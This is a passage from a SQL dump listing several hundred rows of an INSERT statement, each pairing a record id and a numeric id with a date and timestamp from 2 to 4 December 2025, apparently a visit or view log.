06:08:03'),(97468,4637,1,'2025-12-02','2025-12-02 06:09:09'),(97469,2704,1,'2025-12-02','2025-12-02 06:09:10'),(97470,5639,1,'2025-12-02','2025-12-02 06:41:26'),(97471,2904,1,'2025-12-02','2025-12-02 06:44:05'),(97472,2152,1,'2025-12-02','2025-12-02 06:59:19'),(97473,1608,1,'2025-12-02','2025-12-02 07:14:29'),(97474,5639,1,'2025-12-02','2025-12-02 07:23:15'),(97475,5639,1,'2025-12-02','2025-12-02 07:23:51'),(97476,5639,1,'2025-12-02','2025-12-02 07:27:14'),(97477,5639,1,'2025-12-02','2025-12-02 07:32:21'),(97478,5639,1,'2025-12-02','2025-12-02 07:41:47'),(97479,5005,1,'2025-12-02','2025-12-02 07:59:26'),(97480,5578,1,'2025-12-02','2025-12-02 08:04:10'),(97481,1877,1,'2025-12-02','2025-12-02 08:06:25'),(97482,5639,1,'2025-12-02','2025-12-02 08:21:29'),(97483,1770,1,'2025-12-02','2025-12-02 08:42:18'),(97484,5639,1,'2025-12-02','2025-12-02 08:51:11'),(97485,5639,1,'2025-12-02','2025-12-02 08:51:33'),(97486,2904,1,'2025-12-02','2025-12-02 08:51:49'),(97487,2904,1,'2025-12-02','2025-12-02 08:52:29'),(97488,4681,1,'2025-12-02','2025-12-02 08:52:34'),(97489,5639,1,'2025-12-02','2025-12-02 08:52:37'),(97490,474,1,'2025-12-02','2025-12-02 08:53:51'),(97491,91,1,'2025-12-02','2025-12-02 08:54:18'),(97492,5639,1,'2025-12-02','2025-12-02 08:55:38'),(97493,5639,1,'2025-12-02','2025-12-02 08:57:50'),(97494,5639,1,'2025-12-02','2025-12-02 08:57:54'),(97495,5639,1,'2025-12-02','2025-12-02 08:59:41'),(97496,2063,1,'2025-12-02','2025-12-02 09:03:26'),(97497,5639,1,'2025-12-02','2025-12-02 09:04:17'),(97498,5639,1,'2025-12-02','2025-12-02 09:04:35'),(97499,5588,1,'2025-12-02','2025-12-02 09:11:30'),(97500,5588,1,'2025-12-02','2025-12-02 09:12:36'),(97501,3127,1,'2025-12-02','2025-12-02 09:13:42'),(97502,4444,1,'2025-12-02','2025-12-02 09:13:43'),(97503,3742,1,'2025-12-02','2025-12-02 09:13:48'),(97504,3742,1,'2025-12-02','2025-12-02 09:13:59'),(97505,5639,1,'2025-12-02','2025-12-02 09:15:55'),(97506,3691,1,'2025-12-02','2025-12-02 09:22:46'),(97507,5639,1,'2025-12-02','2025-12-02 09:30:07'),(97508,5639,1,'2025-12-02','2025-12-02 09:31:04'),(97509,5639,1,'2025-12-02','2025-12-02 09:33:02'),(97510,4753,1,'2025-12-02','2025-12-02 09:35:21'),(97511,5639,1,'2025-12-02','2025-12-02 09:35:44'),(97512,5639,1,'2025-12-02','2025-12-02 09:37:05'),(97513,5639,1,'2025-12-02','2025-12-02 09:37:49'),(97514,5639,1,'2025-12-02','2025-12-02 09:39:10'),(97515,5639,1,'2025-12-02','2025-12-02 09:40:03'),(97516,91,1,'2025-12-02','2025-12-02 09:44:11'),(97517,5639,1,'2025-12-02','2025-12-02 09:45:22'),(97518,5639,1,'2025-12-02','2025-12-02 09:49:31'),(97519,5639,1,'2025-12-02','2025-12-02 09:51:06'),(97520,5639,1,'2025-12-02','2025-12-02 09:55:30'),(97521,5268,1,'2025-12-02','2025-12-02 09:56:10'),(97522,80,1,'2025-12-02','2025-12-02 10:00:46'),(97523,80,1,'2025-12-02','2025-12-02 10:00:53'),(97524,76,1,'2025-12-02','2025-12-02 10:01:07'),(97525,2503,1,'2025-12-02','2025-12-02 10:01:23'),(97526,2904,1,'2025-12-02','2025-12-02 10:01:38'),(97527,5639,1,'2025-12-02','2025-12-02 10:13:18'),(97528,5639,1,'2025-12-02','2025-12-02 10:31:17'),(97529,5400,1,'2025-12-02','2025-12-02 10:38:29'),(97530,5639,1,'2025-12-02','2025-12-02 10:48:24'),(97531,5472,1,'2025-12-02','2025-12-02 10:49:07'),(97532,5639,1,'2025-12-02','2025-12-02 10:53:40'),(97533,5343,1,'2025-12-02','2025-12-02 10:59:38'),(97534,5639,1,'2025-12-02','2025-12-02 11:01:56'),(97535,1870,1,'2025-12-02','2025-12-02 11:10:24'),(97536,4722,1,'2025-12-02','2025-12-02 11:12:16'),(97537,5639,1,'2025-12-02','2025-12-02 11:14:05'),(97538,486,1,'2025-12-02','2025-12-02 11:20:58'),(97539,5639,1,'2025-12-02','2025-12-02 11:27:57'),(97540,5639,1,'2025-12-02','2025-12-02 11:38:42'),(97541,4966,1,'2025-12-02','2025-12-02 11:40:38'),(97542,5639,1,'2025-12-02','2025-12-02 11:52:58'),(97543,1610,1,'2025-12-02','2025-12-02 11:59:05'),(97544,5639,1,'2025-12-02','2025-12-02 12:10:23'),(97545,5639,1,'2025-12-02','2025-12-02 12:10:23'),(97546,5409,1,'2025-12-02','2025-12-02 12:26:12'),(97547,5639,1,'2025-12-02','2025-12-02 12:35:24'),(97548,5639,1,'2025-12-02','2025-12-02 12:46:02'),(97549,5639,1,'2025-12-02','2025-12-02 13:04:49'),(97550,5397,1,'2025-12-02','2025-12-02 13:06:19'),(97551,4408,1,'2025-12-02','2025-12-02 13:08:24'),(97552,3749,1,'2025-12-02','2025-12-02 13:08:25'),(97553,5406,1,'2025-12-02','2025-12-02 13:11:43'),(97554,5467,1,'2025-12-02','2025-12-02 13:12:45'),(97555,5639,1,'2025-12-02','2025-12-02 13:23:34'),(97556,3267,1,'2025-12-02','2025-12-02 13:26:23'),(97557,3267,1,'2025-12-02','2025-12-02 13:26:44'),(97558,5639,1,'2025-12-02','2025-12-02 13:29:31'),(97559,5639,1,'2025-12-02','2025-12-02 13:29:36'),(97560,472,1,'2025-12-02','2025-12-02 13:32:06'),(97561,5639,1,'2025-12-02','2025-12-02 13:35:00'),(97562,5639,1,'2025-12-02','2025-12-02 13:43:40'),(97563,3117,1,'2025-12-02','2025-12-02 13:46:10'),(97564,484,1,'2025-12-02','2025-12-02 13:46:26'),(97565,4762,1,'2025-12-02','2025-12-02 14:07:29'),(97566,80,1,'2025-12-02','2025-12-02 14:09:10'),(97567,5639,1,'2025-12-02','2025-12-02 14:09:29'),(97568,5639,1,'2025-12-02','2025-12-02 14:10:24'),(97569,5639,1,'2025-12-02','2025-12-02 14:12:09'),(97570,1588,1,'2025-12-02','2025-12-02 14:14:15'),(97571,3278,1,'2025-12-02','2025-12-02 14:26:23'),(97572,5639,1,'2025-12-02','2025-12-02 14:33:46'),(97573,5639,1,'2025-12-02','2025-12-02 14:38:43'),(97574,2410,1,'2025-12-02','2025-12-02 14:44:56'),(97575,5639,1,'2025-12-02','2025-12-02 14:45:54'),(97576,5639,1,'2025-12-02','2025-12-02 14:47:19'),(97577,5639,1,'2025-12-02','2025-12-02 14:59:44'),(97578,5639,1,'2025-12-02','2025-12-02 15:00:54'),(97579,84,1,'2025-12-02','2025-12-02 15:06:24'),(97580,5639,1,'2025-12-02','2025-12-02 15:09:10'),(97581,4950,1,'2025-12-02','2025-12-02 15:16:35'),(97582,80,1,'2025-12-02','2025-12-02 15:16:44'),(97583,5428,1,'2025-12-02','2025-12-02 15:17:38'),(97584,80,1,'2025-12-02','2025-12-02 15:18:06'),(97585,80,1,'2025-12-02','2025-12-02 15:18:48'),(97586,5639,1,'2025-12-02','2025-12-02 15:18:48'),(97587,5639,1,'2025-12-02','2025-12-02 15:29:43'),(97588,5639,1,'2025-12-02','2025-12-02 15:31:57'),(97589,5639,1,'2025-12-02','2025-12-02 15:32:08'),(97590,5639,1,'2025-12-02','2025-12-02 15:34:16'),(97591,4950,1,'2025-12-02','2025-12-02 15:35:16'),(97592,5639,1,'2025-12-02','2025-12-02 15:36:28'),(97593,5639,1,'2025-12-02','2025-12-02 15:36:29'),(97594,5561,1,'2025-12-02','2025-12-02 15:36:34'),(97595,5441,1,'2025-12-02','2025-12-02 15:38:45'),(97596,5125,1,'2025-12-02','2025-12-02 15:39:52'),(97597,2809,1,'2025-12-02','2025-12-02 15:43:46'),(97598,5639,1,'2025-12-02','2025-12-02 15:44:41'),(97599,5639,1,'2025-12-02','2025-12-02 15:44:48'),(97600,5639,1,'2025-12-02','2025-12-02 15:44:53'),(97601,5639,1,'2025-12-02','2025-12-02 15:48:25'),(97602,5639,1,'2025-12-02','2025-12-02 15:51:26'),(97603,72,1,'2025-12-02','2025-12-02 15:52:36'),(97604,5643,1,'2025-12-02','2025-12-02 15:52:53'),(97605,3045,1,'2025-12-02','2025-12-02 15:53:05'),(97606,4977,1,'2025-12-02','2025-12-02 16:01:53'),(97607,5639,1,'2025-12-02','2025-12-02 16:05:53'),(97608,1711,1,'2025-12-02','2025-12-02 16:15:39'),(97609,5639,1,'2025-12-02','2025-12-02 16:28:46'),(97610,4420,1,'2025-12-02','2025-12-02 16:31:59'),(97611,1728,1,'2025-12-02','2025-12-02 16:34:57'),(97612,5436,1,'2025-12-02','2025-12-02 16:37:18'),(97613,5436,1,'2025-12-02','2025-12-02 16:45:48'),(97614,5449,1,'2025-12-02','2025-12-02 16:46:54'),(97615,5307,1,'2025-12-02','2025-12-02 16:48:06'),(97616,5639,1,'2025-12-02','2025-12-02 16:50:35'),(97617,5420,1,'2025-12-02','2025-12-02 16:59:05'),(97618,4323,1,'2025-12-02','2025-12-02 17:04:36'),(97619,5639,1,'2025-12-02','2025-12-02 17:06:30'),(97620,4983,1,'2025-12-02','2025-12-02 17:15:12'),(97621,5502,1,'2025-12-02','2025-12-02 17:19:32'),(97622,3127,1,'2025-12-02','2025-12-02 17:21:08'),(97623,5639,1,'2025-12-02','2025-12-02 17:24:30'),(97624,2904,1,'2025-12-02','2025-12-02 17:25:14'),(97625,4960,1,'2025-12-02','2025-12-02 17:25:17'),(97626,2904,1,'2025-12-02','2025-12-02 17:26:35'),(97627,3486,1,'2025-12-02','2025-12-02 17:27:09'),(97628,3069,1,'2025-12-02','2025-12-02 17:31:48'),(97629,5639,1,'2025-12-02','2025-12-02 17:34:02'),(97630,5492,1,'2025-12-02','2025-12-02 17:34:37'),(97631,84,1,'2025-12-02','2025-12-02 17:45:22'),(97632,4681,1,'2025-12-02','2025-12-02 17:46:54'),(97633,5464,1,'2025-12-02','2025-12-02 17:50:15'),(97634,5464,1,'2025-12-02','2025-12-02 17:50:42'),(97635,4712,1,'2025-12-02','2025-12-02 17:53:32'),(97636,5639,1,'2025-12-02','2025-12-02 18:12:13'),(97637,5639,1,'2025-12-02','2025-12-02 18:15:00'),(97638,5639,1,'2025-12-02','2025-12-02 18:18:33'),(97639,5639,1,'2025-12-02','2025-12-02 18:29:19'),(97640,2904,1,'2025-12-02','2025-12-02 18:29:33'),(97641,2904,1,'2025-12-02','2025-12-02 18:30:06'),(97642,2904,1,'2025-12-02','2025-12-02 18:30:42'),(97643,74,1,'2025-12-02','2025-12-02 18:31:30'),(97644,4569,1,'2025-12-02','2025-12-02 18:55:57'),(97645,4569,1,'2025-12-02','2025-12-02 18:56:07'),(97646,5567,1,'2025-12-02','2025-12-02 19:01:04'),(97647,5639,1,'2025-12-02','2025-12-02 19:22:58'),(97648,5639,1,'2025-12-02','2025-12-02 19:31:32'),(97649,1586,1,'2025-12-02','2025-12-02 19:38:54'),(97650,4963,1,'2025-12-02','2025-12-02 19:40:46'),(97651,4691,1,'2025-12-02','2025-12-02 19:48:35'),(97652,4691,1,'2025-12-02','2025-12-02 19:48:59'),(97653,4691,1,'2025-12-02','2025-12-02 19:49:29'),(97654,4691,1,'2025-12-02','2025-12-02 19:50:04'),(97655,2410,1,'2025-12-02','2025-12-02 19:54:23'),(97656,5639,1,'2025-12-02','2025-12-02 19:55:51'),(97657,5570,1,'2025-12-02','2025-12-02 20:01:27'),(97658,5476,1,'2025-12-02','2025-12-02 20:11:36'),(97659,5454,1,'2025-12-02','2025-12-02 20:34:21'),(97660,5639,1,'2025-12-02','2025-12-02 20:40:22'),(97661,5467,1,'2025-12-02','2025-12-02 20:46:42'),(97662,5530,1,'2025-12-02','2025-12-02 21:00:20'),(97663,5639,1,'2025-12-02','2025-12-02 21:07:03'),(97664,4368,1,'2025-12-02','2025-12-02 21:10:50'),(97665,5639,1,'2025-12-02','2025-12-02 21:13:10'),(97666,5400,1,'2025-12-02','2025-12-02 21:16:22'),(97667,5400,1,'2025-12-02','2025-12-02 21:16:52'),(97668,5400,1,'2025-12-02','2025-12-02 21:17:14'),(97669,4529,1,'2025-12-02','2025-12-02 21:20:34'),(97670,5639,1,'2025-12-02','2025-12-02 21:24:07'),(97671,5639,1,'2025-12-02','2025-12-02 21:26:57'),(97672,5639,1,'2025-12-02','2025-12-02 21:27:19'),(97673,1770,1,'2025-12-02','2025-12-02 21:30:43'),(97674,5425,1,'2025-12-02','2025-12-02 21:36:16'),(97675,5639,1,'2025-12-02','2025-12-02 21:36:32'),(97676,3706,1,'2025-12-02','2025-12-02 21:39:19'),(97677,5639,1,'2025-12-02','2025-12-02 21:41:20'),(97678,4400,1,'2025-12-02','2025-12-02 22:04:04'),(97679,5489,1,'2025-12-02','2025-12-02 22:11:01'),(97680,4966,1,'2025-12-02','2025-12-02 22:11:37'),(97681,5412,1,'2025-12-02','2025-12-02 22:13:19'),(97682,4524,1,'2025-12-02','2025-12-02 22:19:32'),(97683,2904,1,'2025-12-02','2025-12-02 22:21:57'),(97684,1612,1,'2025-12-02','2025-12-02 22:31:18'),(97685,5409,1,'2025-12-02','2025-12-02 22:32:25'),(97686,3788,1,'2025-12-02','2025-12-02 22:40:03'),(97687,3673,1,'2025-12-02','2025-12-02 22:55:20'),(97688,5567,1,'2025-12-02','2025-12-02 23:00:55'),(97689,5495,1,'2025-12-02','2025-12-02 23:08:00'),(97690,5573,1,'2025-12-02','2025-12-02 23:10:44'),(97691,84,1,'2025-12-02','2025-12-02 23:24:02'),(97692,4344,1,'2025-12-02','2025-12-02 23:24:07'),(97693,4344,1,'2025-12-02','2025-12-02 23:24:32'),(97694,5639,1,'2025-12-02','2025-12-02 23:30:37'),(97695,5639,1,'2025-12-02','2025-12-02 23:31:53'),(97696,5639,1,'2025-12-02','2025-12-02 23:33:49'),(97697,474,1,'2025-12-02','2025-12-02 23:39:41'),(97698,4966,1,'2025-12-02','2025-12-02 23:59:03'),(97699,4674,1,'2025-12-03','2025-12-03 00:10:16'),(97700,4674,1,'2025-12-03','2025-12-03 00:11:08'),(97701,3265,1,'2025-12-03','2025-12-03 00:11:27'),(97702,3265,1,'2025-12-03','2025-12-03 00:11:54'),(97703,5334,1,'2025-12-03','2025-12-03 00:14:49'),(97704,5639,1,'2025-12-03','2025-12-03 00:44:36'),(97705,72,1,'2025-12-03','2025-12-03 00:54:08'),(97706,5530,1,'2025-12-03','2025-12-03 00:54:23'),(97707,5639,1,'2025-12-03','2025-12-03 00:55:12'),(97708,5643,1,'2025-12-03','2025-12-03 00:55:12'),(97709,5639,1,'2025-12-03','2025-12-03 00:56:20'),(97710,5643,1,'2025-12-03','2025-12-03 00:56:20'),(97711,5337,1,'2025-12-03','2025-12-03 01:09:03'),(97712,3764,1,'2025-12-03','2025-12-03 01:10:27'),(97713,2293,1,'2025-12-03','2025-12-03 01:43:33'),(97714,3261,1,'2025-12-03','2025-12-03 02:05:06'),(97715,3257,1,'2025-12-03','2025-12-03 02:26:38'),(97716,3486,1,'2025-12-03','2025-12-03 02:28:34'),(97717,5461,1,'2025-12-03','2025-12-03 02:41:33'),(97718,5461,1,'2025-12-03','2025-12-03 02:42:08'),(97719,1606,1,'2025-12-03','2025-12-03 02:48:13'),(97720,467,1,'2025-12-03','2025-12-03 03:08:46'),(97721,1776,1,'2025-12-03','2025-12-03 03:09:47'),(97722,1776,1,'2025-12-03','2025-12-03 03:10:00'),(97723,4608,1,'2025-12-03','2025-12-03 03:13:06'),(97724,1608,1,'2025-12-03','2025-12-03 03:46:23'),(97725,5639,1,'2025-12-03','2025-12-03 04:16:52'),(97726,80,1,'2025-12-03','2025-12-03 04:18:00'),(97727,5639,1,'2025-12-03','2025-12-03 04:20:25'),(97728,4960,1,'2025-12-03','2025-12-03 04:20:38'),(97729,110,1,'2025-12-03','2025-12-03 04:24:40'),(97730,110,1,'2025-12-03','2025-12-03 04:24:56'),(97731,4612,1,'2025-12-03','2025-12-03 04:32:20'),(97732,4888,1,'2025-12-03','2025-12-03 05:03:23'),(97733,3083,1,'2025-12-03','2025-12-03 05:21:28'),(97734,4582,1,'2025-12-03','2025-12-03 05:22:22'),(97735,5639,1,'2025-12-03','2025-12-03 05:25:10'),(97736,3777,1,'2025-12-03','2025-12-03 05:29:22'),(97737,5639,1,'2025-12-03','2025-12-03 05:43:03'),(97738,5639,1,'2025-12-03','2025-12-03 06:12:24'),(97739,5636,1,'2025-12-03','2025-12-03 07:05:24'),(97740,5397,1,'2025-12-03','2025-12-03 07:13:22'),(97741,2395,1,'2025-12-03','2025-12-03 07:25:34'),(97742,3781,1,'2025-12-03','2025-12-03 07:33:22'),(97743,5593,1,'2025-12-03','2025-12-03 08:12:26'),(97744,5639,1,'2025-12-03','2025-12-03 08:14:42'),(97745,1592,1,'2025-12-03','2025-12-03 08:18:29'),(97746,5639,1,'2025-12-03','2025-12-03 08:19:57'),(97747,2904,1,'2025-12-03','2025-12-03 08:20:51'),(97748,5639,1,'2025-12-03','2025-12-03 08:21:59'),(97749,5639,1,'2025-12-03','2025-12-03 08:31:31'),(97750,76,1,'2025-12-03','2025-12-03 08:52:06'),(97751,87,1,'2025-12-03','2025-12-03 08:52:47'),(97752,91,1,'2025-12-03','2025-12-03 08:54:41'),(97753,5067,1,'2025-12-03','2025-12-03 08:56:03'),(97754,5067,1,'2025-12-03','2025-12-03 08:56:05'),(97755,5639,1,'2025-12-03','2025-12-03 09:00:44'),(97756,5639,1,'2025-12-03','2025-12-03 09:10:57'),(97757,5639,1,'2025-12-03','2025-12-03 09:12:51'),(97758,5573,1,'2025-12-03','2025-12-03 09:13:55'),(97759,4785,1,'2025-12-03','2025-12-03 09:17:29'),(97760,91,1,'2025-12-03','2025-12-03 10:00:39'),(97761,5639,1,'2025-12-03','2025-12-03 10:03:04'),(97762,2420,1,'2025-12-03','2025-12-03 10:11:06'),(97763,5639,1,'2025-12-03','2025-12-03 10:30:53'),(97764,2161,1,'2025-12-03','2025-12-03 10:34:47'),(97765,5639,1,'2025-12-03','2025-12-03 10:35:14'),(97766,5639,1,'2025-12-03','2025-12-03 10:37:28'),(97767,5639,1,'2025-12-03','2025-12-03 10:37:30'),(97768,5639,1,'2025-12-03','2025-12-03 10:37:42'),(97769,5639,1,'2025-12-03','2025-12-03 10:37:49'),(97770,5639,1,'2025-12-03','2025-12-03 11:09:36'),(97771,3229,1,'2025-12-03','2025-12-03 11:14:08'),(97772,1582,1,'2025-12-03','2025-12-03 11:23:28'),(97773,5406,1,'2025-12-03','2025-12-03 11:34:57'),(97774,5639,1,'2025-12-03','2025-12-03 11:37:24'),(97775,5639,1,'2025-12-03','2025-12-03 11:38:30'),(97776,4335,1,'2025-12-03','2025-12-03 11:46:58'),(97777,3249,1,'2025-12-03','2025-12-03 11:49:13'),(97778,3271,1,'2025-12-03','2025-12-03 12:22:06'),(97779,4729,1,'2025-12-03','2025-12-03 12:22:51'),(97780,5489,1,'2025-12-03','2025-12-03 12:28:55'),(97781,4963,1,'2025-12-03','2025-12-03 12:32:25'),(97782,4765,1,'2025-12-03','2025-12-03 12:35:29'),(97783,1772,1,'2025-12-03','2025-12-03 12:43:50'),(97784,4950,1,'2025-12-03','2025-12-03 12:44:31'),(97785,5639,1,'2025-12-03','2025-12-03 12:45:09'),(97786,5639,1,'2025-12-03','2025-12-03 12:46:07'),(97787,68,1,'2025-12-03','2025-12-03 12:48:07'),(97788,5639,1,'2025-12-03','2025-12-03 12:55:58'),(97789,5639,1,'2025-12-03','2025-12-03 12:55:59'),(97790,5639,1,'2025-12-03','2025-12-03 12:56:46'),(97791,4971,1,'2025-12-03','2025-12-03 13:00:06'),(97792,72,1,'2025-12-03','2025-12-03 13:10:40'),(97793,5649,1,'2025-12-03','2025-12-03 13:10:51'),(97794,470,1,'2025-12-03','2025-12-03 13:23:49'),(97795,72,1,'2025-12-03','2025-12-03 13:35:32'),(97796,4612,1,'2025-12-03','2025-12-03 13:36:42'),(97797,481,1,'2025-12-03','2025-12-03 13:36:52'),(97798,5421,1,'2025-12-03','2025-12-03 13:51:34'),(97799,1586,1,'2025-12-03','2025-12-03 14:09:29'),(97800,5657,1,'2025-12-03','2025-12-03 14:09:31'),(97801,3178,1,'2025-12-03','2025-12-03 14:12:07'),(97802,5662,1,'2025-12-03','2025-12-03 14:12:24'),(97803,2297,1,'2025-12-03','2025-12-03 14:12:30'),(97804,5649,1,'2025-12-03','2025-12-03 14:23:17'),(97805,2804,1,'2025-12-03','2025-12-03 14:32:30'),(97806,4944,1,'2025-12-03','2025-12-03 14:32:35'),(97807,5639,1,'2025-12-03','2025-12-03 14:41:52'),(97808,2410,1,'2025-12-03','2025-12-03 14:44:24'),(97809,5639,1,'2025-12-03','2025-12-03 14:47:26'),(97810,5649,1,'2025-12-03','2025-12-03 14:57:33'),(97811,5649,1,'2025-12-03','2025-12-03 15:00:09'),(97812,5433,1,'2025-12-03','2025-12-03 15:01:07'),(97813,4556,1,'2025-12-03','2025-12-03 15:02:36'),(97814,5653,1,'2025-12-03','2025-12-03 15:03:00'),(97815,5649,1,'2025-12-03','2025-12-03 15:03:03'),(97816,5653,1,'2025-12-03','2025-12-03 15:05:20'),(97817,5657,1,'2025-12-03','2025-12-03 15:05:24'),(97818,5649,1,'2025-12-03','2025-12-03 15:09:21'),(97819,5649,1,'2025-12-03','2025-12-03 15:10:58'),(97820,5657,1,'2025-12-03','2025-12-03 15:11:12'),(97821,5653,1,'2025-12-03','2025-12-03 15:11:13'),(97822,5657,1,'2025-12-03','2025-12-03 15:14:34'),(97823,1743,1,'2025-12-03','2025-12-03 15:14:51'),(97824,5657,1,'2025-12-03','2025-12-03 15:20:48'),(97825,5657,1,'2025-12-03','2025-12-03 15:20:49'),(97826,5639,1,'2025-12-03','2025-12-03 15:23:22'),(97827,5649,1,'2025-12-03','2025-12-03 15:23:27'),(97828,5657,1,'2025-12-03','2025-12-03 15:24:28'),(97829,5657,1,'2025-12-03','2025-12-03 15:25:21'),(97830,5649,1,'2025-12-03','2025-12-03 15:25:37'),(97831,5657,1,'2025-12-03','2025-12-03 15:25:50'),(97832,5657,1,'2025-12-03','2025-12-03 15:27:45'),(97833,5657,1,'2025-12-03','2025-12-03 15:30:31'),(97834,5653,1,'2025-12-03','2025-12-03 15:34:57'),(97835,5657,1,'2025-12-03','2025-12-03 15:37:55'),(97836,5657,1,'2025-12-03','2025-12-03 15:42:26'),(97837,5657,1,'2025-12-03','2025-12-03 15:47:07'),(97838,5657,1,'2025-12-03','2025-12-03 15:49:44'),(97839,5657,1,'2025-12-03','2025-12-03 15:51:13'),(97840,2904,1,'2025-12-03','2025-12-03 15:51:42'),(97841,2904,1,'2025-12-03','2025-12-03 15:52:26'),(97842,5657,1,'2025-12-03','2025-12-03 15:52:27'),(97843,5657,1,'2025-12-03','2025-12-03 15:54:53'),(97844,5657,1,'2025-12-03','2025-12-03 15:57:17'),(97845,5076,1,'2025-12-03','2025-12-03 16:16:50'),(97846,5662,1,'2025-12-03','2025-12-03 16:21:24'),(97847,5662,1,'2025-12-03','2025-12-03 16:22:27'),(97848,5639,1,'2025-12-03','2025-12-03 16:27:06'),(97849,5639,1,'2025-12-03','2025-12-03 16:27:12'),(97850,5649,1,'2025-12-03','2025-12-03 16:36:54'),(97851,2297,1,'2025-12-03','2025-12-03 16:39:03'),(97852,2769,1,'2025-12-03','2025-12-03 16:43:13'),(97853,5461,1,'2025-12-03','2025-12-03 16:45:35'),(97854,5657,1,'2025-12-03','2025-12-03 16:48:37'),(97855,5649,1,'2025-12-03','2025-12-03 17:10:44'),(97856,5653,1,'2025-12-03','2025-12-03 17:11:23'),(97857,5649,1,'2025-12-03','2025-12-03 17:12:35'),(97858,3240,1,'2025-12-03','2025-12-03 17:21:23'),(97859,2704,1,'2025-12-03','2025-12-03 17:35:04'),(97860,2410,1,'2025-12-03','2025-12-03 17:51:12'),(97861,3674,1,'2025-12-03','2025-12-03 17:59:40'),(97862,4963,1,'2025-12-03','2025-12-03 18:05:01'),(97863,4950,1,'2025-12-03','2025-12-03 18:31:55'),(97864,5400,1,'2025-12-03','2025-12-03 18:40:33'),(97865,5662,1,'2025-12-03','2025-12-03 18:55:32'),(97866,3781,1,'2025-12-03','2025-12-03 18:59:51'),(97867,4776,1,'2025-12-03','2025-12-03 19:14:56'),(97868,5653,1,'2025-12-03','2025-12-03 19:28:44'),(97869,5662,1,'2025-12-03','2025-12-03 19:30:47'),(97870,5502,1,'2025-12-03','2025-12-03 19:37:48'),(97871,4977,1,'2025-12-03','2025-12-03 19:46:45'),(97872,5428,1,'2025-12-03','2025-12-03 20:06:35'),(97873,5657,1,'2025-12-03','2025-12-03 20:21:09'),(97874,3781,1,'2025-12-03','2025-12-03 20:22:06'),(97875,4387,1,'2025-12-03','2025-12-03 20:30:48'),(97876,488,1,'2025-12-03','2025-12-03 20:49:46'),(97877,3275,1,'2025-12-03','2025-12-03 20:50:17'),(97878,3069,1,'2025-12-03','2025-12-03 21:01:05'),(97879,4685,1,'2025-12-03','2025-12-03 21:11:20'),(97880,2411,1,'2025-12-03','2025-12-03 21:24:14'),(97881,5502,1,'2025-12-03','2025-12-03 21:31:08'),(97882,5502,1,'2025-12-03','2025-12-03 21:31:11'),(97883,5649,1,'2025-12-03','2025-12-03 21:43:10'),(97884,3316,1,'2025-12-03','2025-12-03 21:46:19'),(97885,5653,1,'2025-12-03','2025-12-03 22:06:41'),(97886,5657,1,'2025-12-03','2025-12-03 22:06:46'),(97887,5649,1,'2025-12-03','2025-12-03 22:07:57'),(97888,5353,1,'2025-12-03','2025-12-03 22:20:22'),(97889,4835,1,'2025-12-03','2025-12-03 22:20:22'),(97890,5353,1,'2025-12-03','2025-12-03 22:21:29'),(97891,5639,1,'2025-12-03','2025-12-03 22:21:39'),(97892,5639,1,'2025-12-03','2025-12-03 22:23:09'),(97893,5657,1,'2025-12-03','2025-12-03 22:25:09'),(97894,5433,1,'2025-12-03','2025-12-03 22:30:22'),(97895,1582,1,'2025-12-03','2025-12-03 22:38:26'),(97896,3752,1,'2025-12-03','2025-12-03 22:52:09'),(97897,4768,1,'2025-12-03','2025-12-03 23:07:16'),(97898,2704,1,'2025-12-03','2025-12-03 23:30:25'),(97899,4950,1,'2025-12-03','2025-12-03 23:35:00'),(97900,5409,1,'2025-12-04','2025-12-04 00:16:04'),(97901,1772,1,'2025-12-04','2025-12-04 00:18:01'),(97902,4657,1,'2025-12-04','2025-12-04 00:18:08'),(97903,3724,1,'2025-12-04','2025-12-04 00:18:10'),(97904,4694,1,'2025-12-04','2025-12-04 00:33:03'),(97905,1699,1,'2025-12-04','2025-12-04 00:48:17'),(97906,74,1,'2025-12-04','2025-12-04 01:03:22'),(97907,5578,1,'2025-12-04','2025-12-04 01:13:44'),(97908,5639,1,'2025-12-04','2025-12-04 01:14:59'),(97909,3006,1,'2025-12-04','2025-12-04 01:19:43'),(97910,2419,1,'2025-12-04','2025-12-04 01:22:52'),(97911,4870,1,'2025-12-04','2025-12-04 01:31:09'),(97912,1586,1,'2025-12-04','2025-12-04 01:31:49'),(97913,482,1,'2025-12-04','2025-12-04 01:33:55'),(97914,4944,1,'2025-12-04','2025-12-04 01:54:12'),(97915,4878,1,'2025-12-04','2025-12-04 02:08:52'),(97916,4941,1,'2025-12-04','2025-12-04 02:14:32'),(97917,4941,1,'2025-12-04','2025-12-04 02:15:36'),(97918,4457,1,'2025-12-04','2025-12-04 02:17:52'),(97919,5522,1,'2025-12-04','2025-12-04 02:21:08'),(97920,4941,1,'2025-12-04','2025-12-04 02:33:42'),(97921,1772,1,'2025-12-04','2025-12-04 02:37:44'),(97922,5323,1,'2025-12-04','2025-12-04 02:43:34'),(97923,4950,1,'2025-12-04','2025-12-04 03:10:52'),(97924,4332,1,'2025-12-04','2025-12-04 03:18:31'),(97925,2411,1,'2025-12-04','2025-12-04 03:21:47'),(97926,4338,1,'2025-12-04','2025-12-04 03:22:49'),(97927,80,1,'2025-12-04','2025-12-04 03:32:58'),(97928,1701,1,'2025-12-04','2025-12-04 03:53:21'),(97929,4517,1,'2025-12-04','2025-12-04 04:02:05'),(97930,5530,1,'2025-12-04','2025-12-04 04:08:42'),(97931,3180,1,'2025-12-04','2025-12-04 04:08:51'),(97932,5436,1,'2025-12-04','2025-12-04 04:11:55'),(97933,4976,1,'2025-12-04','2025-12-04 04:21:49'),(97934,5024,1,'2025-12-04','2025-12-04 04:32:17'),(97935,5024,1,'2025-12-04','2025-12-04 04:33:40'),(97936,3781,1,'2025-12-04','2025-12-04 04:41:17'),(97937,3229,1,'2025-12-04','2025-12-04 04:50:53'),(97938,3005,1,'2025-12-04','2025-12-04 04:54:46'),(97939,5657,1,'2025-12-04','2025-12-04 05:16:30'),(97940,5657,1,'2025-12-04','2025-12-04 05:19:33'),(97941,5146,1,'2025-12-04','2025-12-04 05:30:31'),(97942,4988,1,'2025-12-04','2025-12-04 05:39:47'),(97943,3041,1,'2025-12-04','2025-12-04 05:50:02'),(97944,3041,1,'2025-12-04','2025-12-04 05:58:48'),(97945,5457,1,'2025-12-04','2025-12-04 06:00:32'),(97946,2148,1,'2025-12-04','2025-12-04 06:00:36'),(97947,84,1,'2025-12-04','2025-12-04 06:05:31'),(97948,3005,1,'2025-12-04','2025-12-04 06:07:33'),(97949,3482,1,'2025-12-04','2025-12-04 06:09:20'),(97950,5639,1,'2025-12-04','2025-12-04 06:13:13'),(97951,4551,1,'2025-12-04','2025-12-04 06:20:27'),(97952,1586,1,'2025-12-04','2025-12-04 